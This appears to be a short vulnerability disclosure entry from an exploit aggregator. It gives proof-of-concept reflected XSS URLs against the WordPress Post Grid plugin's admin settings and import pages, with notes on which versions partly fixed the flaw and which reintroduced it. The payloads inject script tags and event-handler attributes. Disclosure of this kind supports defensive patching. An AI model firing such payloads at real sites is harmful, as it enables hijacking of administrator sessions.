Share
## https://sploitus.com/exploit?id=WPEX-ID:1FC0AACE-BA85-4939-9007-D150960ADD4A
https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>
https://example.com/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//

v 2.1.4 partially fixed the issue, still allowing arbitrary attributes to be injected, ie
https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="+accesskey=X+onclick=alert(1)//

v2.1.5 removed a lot of escaping done in 2.1.4, and was put back in v2.1.8